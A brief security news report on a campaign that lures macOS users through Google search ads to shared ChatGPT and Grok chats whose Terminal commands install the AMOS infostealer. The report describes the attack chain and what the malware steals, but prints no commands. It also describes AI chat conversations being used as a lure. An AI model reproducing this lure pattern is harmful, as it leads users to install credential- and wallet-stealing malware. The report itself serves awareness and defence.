A new campaign is using Google search ads to trick macOS users into downloading the AMOS infostealer malware. Cybersecurity researchers from Kaspersky and Huntress discovered that the campaign targets users searching for help with macOS issues, such as maintenance or troubleshooting. By using ads that lead to seemingly helpful ChatGPT and Grok conversations, the attackers provide malicious instructions that, if followed, install the malware on victims' systems. Once users execute commands from the AI-generated chats in the Terminal, a base64-encoded URL decodes into a bash script that creates a fake password prompt. When users enter their passwords, the malware captures this information and uses it to download and execute the AMOS infostealer with elevated privileges. This malware, which has been active since April 2023, specifically targets macOS and rents its services for $1,000 a month. Once installed, it looks for cryptocurrency wallets and sensitive data, overwriting legitimate wallet applications with fake versions designed to steal users' seed phrases. Persistence is maintained through a hidden LaunchDaemon that restarts the malware if it is terminated. The AMOS infostealer not only targets cryptocurrency wallets but also collects a wide range of sensitive information, including browser cookies, passwords, and macOS Keychain data. Researchers emphasize the importance of being cautious with online commands, as even a simple follow-up question about the safety of the instructions can reveal their malicious intent.